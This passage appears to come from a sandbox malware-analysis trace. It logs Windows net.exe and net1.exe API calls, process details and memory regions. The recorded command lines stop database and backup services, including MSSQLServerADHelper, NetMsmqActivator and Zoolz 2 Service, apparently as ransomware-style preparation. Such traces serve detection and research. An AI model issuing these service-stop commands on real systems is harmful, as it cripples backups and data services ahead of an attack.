_DstBuf=0x1af7d8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0122.127] setlocale (category=0, locale=".437") returned="English_United States.437" [0122.128] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0122.128] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0122.128] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLServerADHelper /y " [0122.129] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1af570, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0122.129] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0122.129] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1af7c8 | out: Buffer=0x1af7c8*=0x344d60) returned 0x0 [0122.129] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1af7c8 | out: Buffer=0x1af7c8*=0x34c130) returned 0x0 [0122.129] _fileno (_File=0x7fefdba2a80) returned 0 [0122.129] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0122.129] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0122.129] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0122.129] _wcsicmp (_String1="config", _String2="stop") returned -16 [0122.129] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0122.129] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0122.129] _wcsicmp (_String1="file", _String2="stop") returned -13 [0122.129] _wcsicmp (_String1="files", _String2="stop") returned -13 [0122.130] _wcsicmp (_String1="group", _String2="stop") returned -12 [0122.130] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0122.130] _wcsicmp (_String1="help", _String2="stop") returned -11 [0122.130] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0122.130] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0122.130] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0122.130] _wcsicmp (_String1="session", _String2="stop") returned -15 [0122.130] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0122.130] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0122.130] _wcsicmp (_String1="share", _String2="stop") returned -12 [0122.130] _wcsicmp (_String1="start", _String2="stop") returned -14 [0122.130] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0122.130] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0122.130] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0122.130] _wcsicmp (_String1="accounts", _String2="MSSQLServerADHelper") returned -12 [0122.130] _wcsicmp (_String1="computer", _String2="MSSQLServerADHelper") returned -10 [0122.130] _wcsicmp (_String1="config", _String2="MSSQLServerADHelper") returned -10 [0122.130] _wcsicmp (_String1="continue", _String2="MSSQLServerADHelper") returned -10 [0122.130] _wcsicmp (_String1="cont", _String2="MSSQLServerADHelper") returned -10 [0122.130] _wcsicmp (_String1="file", _String2="MSSQLServerADHelper") returned -7 [0122.130] _wcsicmp (_String1="files", _String2="MSSQLServerADHelper") returned -7 [0122.130] _wcsicmp (_String1="group", _String2="MSSQLServerADHelper") returned -6 [0122.130] _wcsicmp (_String1="groups", _String2="MSSQLServerADHelper") returned -6 [0122.130] _wcsicmp (_String1="help", _String2="MSSQLServerADHelper") returned -5 [0122.130] _wcsicmp (_String1="helpmsg", _String2="MSSQLServerADHelper") returned -5 [0122.130] _wcsicmp (_String1="localgroup", _String2="MSSQLServerADHelper") returned -1 [0122.130] _wcsicmp (_String1="pause", _String2="MSSQLServerADHelper") returned 3 [0122.130] _wcsicmp (_String1="session", _String2="MSSQLServerADHelper") returned 6 [0122.130] _wcsicmp (_String1="sessions", _String2="MSSQLServerADHelper") returned 6 [0122.130] _wcsicmp (_String1="sess", _String2="MSSQLServerADHelper") returned 6 [0122.131] _wcsicmp (_String1="share", _String2="MSSQLServerADHelper") returned 6 [0122.131] _wcsicmp (_String1="start", _String2="MSSQLServerADHelper") returned 6 [0122.131] _wcsicmp (_String1="stats", _String2="MSSQLServerADHelper") returned 6 [0122.131] _wcsicmp (_String1="statistics", _String2="MSSQLServerADHelper") returned 6 [0122.131] _wcsicmp (_String1="stop", _String2="MSSQLServerADHelper") returned 6 [0122.131] _wcsicmp (_String1="time", _String2="MSSQLServerADHelper") returned 7 [0122.131] _wcsicmp (_String1="user", _String2="MSSQLServerADHelper") returned 8 [0122.131] _wcsicmp (_String1="users", _String2="MSSQLServerADHelper") returned 8 [0122.131] _wcsicmp (_String1="msg", _String2="MSSQLServerADHelper") returned -12 [0122.131] _wcsicmp (_String1="messenger", _String2="MSSQLServerADHelper") returned -14 [0122.131] _wcsicmp (_String1="receiver", _String2="MSSQLServerADHelper") returned 5 [0122.131] _wcsicmp (_String1="rcv", _String2="MSSQLServerADHelper") returned 5 [0122.131] _wcsicmp (_String1="netpopup", _String2="MSSQLServerADHelper") returned 1 [0122.131] _wcsicmp (_String1="redirector", _String2="MSSQLServerADHelper") returned 5 [0122.131] _wcsicmp (_String1="redir", _String2="MSSQLServerADHelper") returned 5 [0122.131] _wcsicmp (_String1="rdr", _String2="MSSQLServerADHelper") returned 5 [0122.131] _wcsicmp (_String1="workstation", _String2="MSSQLServerADHelper") returned 10 [0122.131] _wcsicmp (_String1="work", _String2="MSSQLServerADHelper") returned 10 [0122.131] _wcsicmp (_String1="wksta", _String2="MSSQLServerADHelper") returned 10 [0122.131] _wcsicmp (_String1="prdr", _String2="MSSQLServerADHelper") returned 3 [0122.131] _wcsicmp (_String1="devrdr", _String2="MSSQLServerADHelper") returned -9 [0122.131] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLServerADHelper") returned -1 [0122.131] _wcsicmp (_String1="server", _String2="MSSQLServerADHelper") returned 6 [0122.131] _wcsicmp (_String1="svr", _String2="MSSQLServerADHelper") returned 6 [0122.131] _wcsicmp (_String1="srv", _String2="MSSQLServerADHelper") returned 6 [0122.131] _wcsicmp (_String1="lanmanserver", _String2="MSSQLServerADHelper") returned -1 [0122.131] _wcsicmp (_String1="alerter", _String2="MSSQLServerADHelper") returned -12 [0122.131] _wcsicmp (_String1="netlogon", _String2="MSSQLServerADHelper") returned 1 [0122.132] _wcsupr (in: _String="MSSQLServerADHelper" | out: _String="MSSQLSERVERADHELPER") returned="MSSQLSERVERADHELPER" [0122.132] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x34ce40 [0122.136] GetServiceKeyNameW (in: hSCManager=0x34ce40, lpDisplayName="MSSQLSERVERADHELPER", lpServiceName=0xffb35750, lpcchBuffer=0x1af6e8 | out: lpServiceName="", lpcchBuffer=0x1af6e8) returned 0 [0122.137] _wcsicmp (_String1="msg", _String2="MSSQLSERVERADHELPER") returned -12 [0122.137] _wcsicmp (_String1="messenger", _String2="MSSQLSERVERADHELPER") returned -14 [0122.137] _wcsicmp (_String1="receiver", _String2="MSSQLSERVERADHELPER") returned 5 [0122.137] _wcsicmp (_String1="rcv", _String2="MSSQLSERVERADHELPER") returned 5 [0122.137] _wcsicmp (_String1="redirector", _String2="MSSQLSERVERADHELPER") returned 5 [0122.137] _wcsicmp (_String1="redir", _String2="MSSQLSERVERADHELPER") returned 5 [0122.137] _wcsicmp (_String1="rdr", _String2="MSSQLSERVERADHELPER") returned 5 [0122.138] _wcsicmp (_String1="workstation", _String2="MSSQLSERVERADHELPER") returned 10 [0122.138] _wcsicmp (_String1="work", _String2="MSSQLSERVERADHELPER") returned 10 [0122.138] _wcsicmp (_String1="wksta", _String2="MSSQLSERVERADHELPER") returned 10 [0122.138] _wcsicmp (_String1="prdr", _String2="MSSQLSERVERADHELPER") returned 3 [0122.138] _wcsicmp (_String1="devrdr", _String2="MSSQLSERVERADHELPER") returned -9 [0122.138] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLSERVERADHELPER") returned -1 [0122.138] _wcsicmp (_String1="server", _String2="MSSQLSERVERADHELPER") returned 6 [0122.138] _wcsicmp (_String1="svr", _String2="MSSQLSERVERADHELPER") returned 6 [0122.138] _wcsicmp (_String1="srv", _String2="MSSQLSERVERADHELPER") returned 6 [0122.138] _wcsicmp (_String1="lanmanserver", _String2="MSSQLSERVERADHELPER") returned -1 [0122.138] _wcsicmp (_String1="alerter", _String2="MSSQLSERVERADHELPER") returned -12 [0122.138] _wcsicmp (_String1="netlogon", _String2="MSSQLSERVERADHELPER") returned 1 [0122.138] NetServiceControl (in: servername=0x0, service="MSSQLSERVERADHELPER", opcode=0x0, arg=0x0, bufptr=0x1af6f0 | out: bufptr=0x1af6f0) returned 0x889 [0122.139] wcscpy_s (in: _Destination=0xffb380d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0122.139] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0122.140] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffb35b50, nSize=0x800, Arguments=0xffb37f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0122.142] GetFileType (hFile=0xb) returned 0x2 [0122.142] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af5b8 | out: lpMode=0x1af5b8) returned 1 [0122.143] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb35b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1af5b0, lpReserved=0x0 | out: lpBuffer=0xffb35b50*, lpNumberOfCharsWritten=0x1af5b0*=0x1e) returned 1 [0122.143] GetFileType (hFile=0xb) returned 0x2 [0122.143] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af5b8 | out: lpMode=0x1af5b8) returned 1 [0122.144] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1af5b0, lpReserved=0x0 | out: lpBuffer=0xffb11efc*, lpNumberOfCharsWritten=0x1af5b0*=0x2) returned 1 [0122.144] _ultow (in: _Dest=0x889, _Radix=1766944 | out: _Dest=0x889) returned="2185" [0122.144] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffb35b50, nSize=0x800, Arguments=0xffb37f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0122.144] GetFileType (hFile=0xb) returned 0x2 [0122.144] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af5b8 | out: lpMode=0x1af5b8) returned 1 [0122.145] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb35b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1af5b0, lpReserved=0x0 | out: lpBuffer=0xffb35b50*, lpNumberOfCharsWritten=0x1af5b0*=0x34) returned 1 [0122.145] GetFileType (hFile=0xb) returned 0x2 [0122.145] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af5b8 | out: lpMode=0x1af5b8) returned 1 [0122.145] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffb11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1af5b0, lpReserved=0x0 | out: lpBuffer=0xffb11efc*, lpNumberOfCharsWritten=0x1af5b0*=0x2) returned 1 [0122.146] NetApiBufferFree (Buffer=0x344d60) returned 0x0 [0122.146] NetApiBufferFree (Buffer=0x34c130) returned 0x0 [0122.146] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLServerADHelper /y " [0122.146] exit (_Code=2) Process: id = "383" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x7a689000" os_pid = "0xd38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop NetMsmqActivator /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13354 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13355 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13356 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13357 start_va = 0x170000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 13358 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13359 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 13360 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13361 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 13362 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13363 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 13364 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 13365 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 13366 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13367 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13368 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 13369 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13370 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 13371 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 13372 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 932 os_tid = 0xccc Process: id = "384" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x2332000" os_pid = "0xeb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "375" os_parent_pid = "0xb28" cmd_line = "C:\\Windows\\system32\\net1 stop \"Zoolz 2 Service\" /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13393 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13394 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13395 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13396 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 13397 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13398 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 13399 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 13400 start_va = 0xffb10000 end_va = 0xffb42fff entry_point = 0xffb10000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 13401 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13402 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 13403 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 13404 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 13672 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13673 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13674 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 13675 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13676 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 13677 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 13678 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13717 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13718 start_va = 0xc0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 13719 start_va = 0x5c0000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 13720 start_va = 0x7fef4380000 end_va = 0x7fef4391fff entry_point = 0x7fef4380000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 13721 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 13722 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 13723 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 13724 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 13725 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 13726 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 13727 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 13728 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 13729 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 13730 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13731 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 13732 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 13733 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 13734 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 13735 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 13778 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 934 os_tid = 0xd4c [0122.960] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24f830 | out: lpSystemTimeAsFileTime=0x24f830*(dwLowDateTime=0xfe6ab2d0, dwHighDateTime=0x1d48689)) [0122.960] GetCurrentProcessId () returned 0xeb0 [0122.960] GetCurrentThreadId () returned 0xd4c [0122.960] GetTickCount () returned 0x285f1 [0122.960] QueryPerformanceCounter (in: lpPerformanceCount=0x24f838 | out: lpPerformanceCount=0x24f838*=1816987900000) returned 1 [0122.961] GetModuleHandleW (lpModuleName=0x0) returned 0xffb10000 [0122.961] __set_app_type (_Type=0x1) [0122.961] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffb29c9c) returned 0x0 [0122.961] __getmainargs (in: _Argc=0xffb34780, _Argv=0xffb34790, _Env=0xffb34788, _DoWildCard=0, _StartInfo=0xffb3479c | out: _Argc=0xffb34780, _Argv=0xffb34790, _Env=0xffb34788) returned 0 [0122.961] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0122.962] GetConsoleOutputCP () returned 0x1b5 [0122.962] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffb3cec0 | out: lpCPInfo=0xffb3cec0) returned 1 [0122.962] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0122.963] sprintf_s (in: _DstBuf=0x24f7d8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0122.964] setlocale (category=0, locale=".437") returned="English_United States.437" [0122.965] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0122.965] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0122.965] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop \"Zoolz 2 Service\" /y" [0122.965] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x24f570, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0122.965] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0122.966] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x24f7c8 | out: Buffer=0x24f7c8*=0x394d60) returned 0x0 [0122.966] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x24f7c8 | out: Buffer=0x24f7c8*=0x39c120) returned 0x0 [0122.966] _fileno (_File=0x7fefdba2a80) returned 0 [0122.966] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0122.966] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0122.966] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0122.966] _wcsicmp (_String1="config", _String2="stop") returned -16 [0122.966] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0122.966] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0122.966] _wcsicmp (_String1="file", _String2="stop") returned -13 [0122.966] _wcsicmp (_String1="files", _String2="stop") returned -13 [0122.966] _wcsicmp (_String1="group", _String2="stop") returned -12 [0122.966] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0122.966] _wcsicmp (_String1="help", _String2="stop") returned -11 [0122.966] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0122.966] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0122.966] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0122.966] _wcsicmp (_String1="session", _String2="stop") returned -15 [0122.966] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0122.966] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0122.966] _wcsicmp (_String1="share", _String2="stop") returned -12 [0122.966] _wcsicmp (_String1="start", _String2="stop") returned -14 [0122.966] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0122.966] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0122.966] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0122.966] _wcsicmp (_String1="accounts", _String2="Zoolz 2 Service") returned -25 [0122.966] _wcsicmp (_String1="computer", _String2="Zoolz 2 Service") returned -23 [0122.966] _wcsicmp (_String1="config", _String2="Zoolz 2 Service") returned -23 [0122.966] _wcsicmp (_String1="continue", _String2="Zoolz 2 Service") returned -23 [0122.967] _wcsicmp (_String1="cont", _String2="Zoolz 2 Service") returned -23 [0122.967] _wcsicmp (_String1="file", _String2="Zoolz 2 Service") returned -20 [0122.967] _wcsicmp (_String1="files", _String2="Zoolz 2 Service") returned -20 [0122.967] _wcsicmp (_String1="group", _String2="Zoolz 2 Service") returned -19 [0122.967] _wcsicmp (_String1="groups", _String2="Zoolz 2 Service") returned -19 [0122.967] _wcsicmp (_String1="help", _String2="Zoolz 2 Service") returned -18 [0122.967] _wcsicmp (_String1="helpmsg", _String2="Zoolz 2 Service") returned -18 [0122.967] _wcsicmp (_String1="localgroup", _String2="Zoolz 2 Service") returned -14 [0122.967] _wcsicmp (_String1="pause", _String2="Zoolz 2 Service") returned -10 [0122.967] _wcsicmp (_String1="session", _String2="Zoolz 2 Service") returned -7 [0122.967] _wcsicmp (_String1="sessions", _String2="Zoolz 2 Service") returned -7 [0122.967] _wcsicmp (_String1="sess", _String2="Zoolz 2 Service") returned -7 [0122.967] 